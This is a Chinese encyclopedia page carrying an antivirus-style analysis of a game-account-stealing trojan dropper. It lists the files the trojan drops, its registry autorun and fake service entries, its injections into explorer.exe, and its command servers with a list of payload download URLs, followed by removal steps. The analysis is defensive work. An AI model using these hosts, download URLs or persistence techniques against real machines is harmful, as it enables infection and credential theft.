当前位置: 王朝网络 >> 百科 >> Trojan-Dropper.Win32.Delf.or

Trojan-Dropper.Win32.Delf.or

王朝百科·作者佚名 2010-02-19

窄屏简体版字體: 小|中|大|超大

病毒名称： Trojan-Dropper.Win32.Delf.or

中文名称：武汉男生变种

病毒类型：木马类

文件 MD5： DD26CCAD1848DE5663F0B8892EB4DAE5

公开范围：完全公开

危害等级：中等

文件长度： 75,269 字节

感染系统： Win98以上系统

开发工具： Borland Delphi 6.0 - 7.0

加壳类型:nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]

ASPack 2.x (without poly) -> Alexey Solodovnikov

命名对照：驱逐舰[BackDoor.Pegion.516]

瑞星[Worm.Nimaya.al]

病毒描述：

该病毒运行后，病毒衍生文件到系统目录下，连接某服务器获得要下载病毒的地址到本机运行。添加注册表自动运行项与服务项以随机引导病毒体。该病毒主要为盗取用户游戏账号为主。包括征途、传奇、QQ、热血江湖等。

行为分析：

1、衍生下列副本与文件

%Windir% tembay.exe

%Windir%ly.exe

%Windir%my.exe

%Windir%wanmei.exe

%Windir%wl.exe

%System32%1.exe

%System32%2.exe

%System32%Security.exe

%System32%iexpl0re.exe

%System32%userspi.dll

%System32%wdfmgr32.exe

%System32%windhcp.ocx

%System32%winlogin.exe

%System32%wsvbs.dll

%System32%wunk32.exe

%System32%dirvers usbme.sys

%System32%dirvers spoclsv.exe

%ProgramFiles% Desktop_.ini

2、新建注册表键值：

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

policiesExplorerRunwin 键值: 字符串: "%WINDIR%

system32wunk32.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

Run2ls1essru 键值: 字符串: "%WINDIR%iexpiore.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

Runwsvbs 键值: 字符串: "%WINDIR%wanmei.exe"

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion

Runsvcshare

键值: 字符串: "%WINDIR%system32driversspoclsv.exe"

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion

RunSymhMy

键值: 字符串: "%WINDIR%system32iexpl0re.exe"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServerAC

Description

键值: 字符串: "给予本地帐户高级保护机制。"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServerAC

DisplayName

键值: 字符串: "Server Advance"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServerAC

ImagePath

键值: 类型: REG_EXPAND_SZ 长度: 33 (0x21) 字节

%WINDIR%system32Security.exe

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

Description 键值: 字符串: "为远程计算机注册并更新 IP 地址。"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

DisplayName 键值: 字符串: "Windows DHCP Service"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

ImagePath 键值: 类型: REG_EXPAND_SZ 长度: 52 (0x34) 字节

%WINDIR%system32\rundll32.exe windhcp.ocx

3、连接某服务器地址获得要下载的病毒体地址：

www.krvkr.com(58.215.79.164)

www.whboy.net(58.215.79.64)

GET /update/wormcn.txt

User-Agent: QQ

Host: www.whboy.net

wormcn.txt内容：

http://www.krvkr.com/down/cq.exe

http://www.krvkr.com/down/ly.exe

http://www.krvkr.com/down/my.exe

http://www.krvkr.com/down/rx.exe

http://www.krvkr.com/down/wl.exe

http://www.krvkr.com/down/wow.exe

http://www.krvkr.com/down/zt.exe

http://www.krvkr.com/down/wanmei.exe

http://www.krvkr.com/down/dj.exe

http://www.krvkr.com/down/kr/itembay.exe

4、插入线程：

windhcp.ocx 到 explorer.exe进程

userspi.dll 到 explorer.exe进程

wsvbs.dll 到 explorer.exe进程

注：% System%是一个：可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32，windows95/98/me中默认的安装路径是C:WindowsSystem，windowsXP中默认的安装路径是C:WindowsSystem32。

--------------------------------------------------------------------------------

清除方案：

1、使用安天木马防线可彻底清除此病毒(推荐)

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

(1) 使用安天木马防线“进程管理”关闭病毒进程

spoclsv.exe

iexpl0re.exe

(2) 使用安天木马防线禁用下列服务：

Server Advance

(3) 找到下列注册表键值：

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

ImagePath： %WINDdirsystem32\rundll32.exe windhcp.ocx,start